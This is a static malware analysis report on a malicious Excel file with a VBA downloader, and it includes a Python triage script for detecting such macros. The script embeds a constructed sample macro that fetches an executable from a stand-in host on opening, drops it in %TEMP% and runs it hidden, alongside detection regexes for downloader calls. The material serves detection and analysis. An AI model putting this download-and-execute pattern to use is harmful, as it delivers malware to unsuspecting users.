Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 1136a76ea8184a8f…

MALICIOUS

Office (OLE) / .XLSX

Size: 36.5 KB
Created: 2023-02-20 10:14:07
Authoring application: Microsoft Excel
First seen: 2023-02-20

MD5:     0dde13582231ec6ad2f59da240066026
SHA-1:   089e01fcd775d7768788917c6dfc595f3b0a23c7
SHA-256: 1136a76ea8184a8fe4c075b839cc3b1cd169351d0f3410a741b3719059e89e9f

Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The file contains VBA macros that reference the URLDownloadToFile API, which fetches a remote resource and writes it to a local path: the core of a downloader that retrieves a secondary payload. The CreateObject and Environ() calls fit that picture. CreateObject is commonly used to instantiate a scripting or shell object (such as WScript.Shell) to run the downloaded file, and Environ() to resolve a writable drop location such as %TEMP%. The download URL is obfuscated in the macro, so no network indicator could be recovered statically; the extracted macro source should be deobfuscated or the sample detonated in a sandbox to obtain it. Taken together, these indicators strongly point to downloader or dropper functionality, consistent with the T1059.005 and T1105 mapping above.

Heuristics (5)

  • SC_STR_URLDOWNLOAD (critical): Reference to URLDownloadToFile API
  • OLE_VBA_DOWNLOAD (critical): URLDownloadToFile in VBA
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_MACROS (medium): VBA macros detected (document contains VBA macro code)
  • OLE_VBA_ENVIRON (low): Environ() call (environment variable access)
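The indicators named in the insights paragraph and in the heuristics list can be re-checked by hand on the decoded VBA source that olevba extracts. The Python below is an added example, not part of this report and not oletools code: it joins line continuations, strips comments, fires rules named after the report's rule IDs, and rebuilds string literals that were split with & so an obfuscated URL can be recovered. The regexes, the split between the string-level SC_STR_ rule (run over the raw text) and the code-level OLE_VBA_ rules (run over comment-stripped code), and the sample macro are all my assumptions; the macro is a constructed stand-in for a downloader, not the sample's code, and its URL uses the reserved .invalid domain.

```python
"""Triage of olevba-decoded VBA source for downloader indicators (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed stand-in for an olevba-decoded macros.bas; NOT the analysed sample's code.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisWorkbook"
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Private Sub Workbook_Open()
    Dim u As String, p As String
    ' URL split into fragments so a single-string scan misses it
    u = "ht" & "tp://" & "exa" & "mple.inv" & "alid/upd" & "ate.exe"
    p = Environ("TEMP") & "\" & "svc.exe"
    If URLDownloadToFileA(0, u, p, 0, 0) = 0 Then
        CreateObject("WScript.Shell").Run p, 0, False
    End If
End Sub
'''

# (rule id, severity, regex). Rule IDs follow the report; the patterns are assumptions.
CODE_RULES: List[Tuple[str, str, str]] = [
    ("OLE_VBA_DOWNLOAD", "critical", r"\bURLDownloadToFile[AW]?\b"),
    ("OLE_VBA_CREATEOBJ", "high", r"\bCreateObject\s*\("),
    ("OLE_VBA_MACROS", "medium", r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\b"),
    ("OLE_VBA_ENVIRON", "low", r"\bEnviron\$?\s*\("),
]
STRING_RULES: List[Tuple[str, str, str]] = [
    ("SC_STR_URLDOWNLOAD", "critical", r"URLDownloadToFile"),
]


def _strip_comment(line: str) -> str:
    """Drop a trailing ' comment, ignoring apostrophes inside "..." literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str  # a doubled "" toggles twice, which is correct
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def normalize(src: str) -> str:
    """Join ' _' line continuations and strip comments so rules see whole statements."""
    joined = re.sub(r"[ \t]_[ \t]*\r?\n", " ", src)
    return "\n".join(_strip_comment(line) for line in joined.splitlines())


def scan(src: str) -> List[Tuple[str, str, int]]:
    """Return (rule_id, severity, hit_count) for every rule that fires."""
    code = normalize(src)
    hits: List[Tuple[str, str, int]] = []
    for rid, sev, pat in STRING_RULES:  # string rules: raw text, comments included
        n = len(re.findall(pat, src, re.IGNORECASE))
        if n:
            hits.append((rid, sev, n))
    for rid, sev, pat in CODE_RULES:  # code rules: comment-stripped statements
        n = len(re.findall(pat, code, re.IGNORECASE | re.MULTILINE))
        if n:
            hits.append((rid, sev, n))
    return hits


# A token is a "..." literal (group 1), an ampersand (group 2), or any other run.
_TOKEN = re.compile(r'"((?:[^"]|"")*)"|(&)|[^\s"&]+')


def recover_concatenated_strings(src: str) -> List[str]:
    """Rebuild literals split with & ("ht" & "tp://"), a common URL-hiding trick."""
    out: List[str] = []
    for line in normalize(src).splitlines():
        parts: List[str] = []  # literals of the chain being assembled
        pending = False        # True right after an & that follows a literal

        def flush() -> None:
            if len(parts) >= 2:  # a lone literal is not obfuscation
                out.append("".join(parts))
            parts.clear()

        for m in _TOKEN.finditer(line):
            if m.group(1) is not None:
                if not pending:
                    flush()
                parts.append(m.group(1).replace('""', '"'))
                pending = False
            elif m.group(2):
                pending = bool(parts)
            else:  # identifier, call or operator breaks the chain
                flush()
                pending = False
        flush()
    return out


def triage(src: str) -> Dict[str, object]:
    """Combine rule hits and recovered strings into one verdict-style summary."""
    hits = scan(src)
    ids = {h[0] for h in hits}
    return {
        "hits": hits,
        "recovered_strings": recover_concatenated_strings(src),
        # download API plus object creation is the downloader/dropper pattern from the report
        "downloader": {"OLE_VBA_DOWNLOAD", "OLE_VBA_CREATEOBJ"} <= ids,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

In practice the input is the text olevba writes out for each VBA module (olevba -c or the extract_macros API); the string-recovery step only handles & concatenation of literals, so Chr()-built or Base64-encoded URLs still need the macro run in a sandbox or stepped through in the VBA debugger.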

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename: macros.bas
  Kind:     vba-macro
  Source:   oletools.olevba.extract_macros (decoded VBA source)
  Size:     2320 bytes
  SHA-256:  ca81e31ce4f8342cdfcf5f64530a9ad45d5c332e89a0f7c82ecf2aa37ff1ca03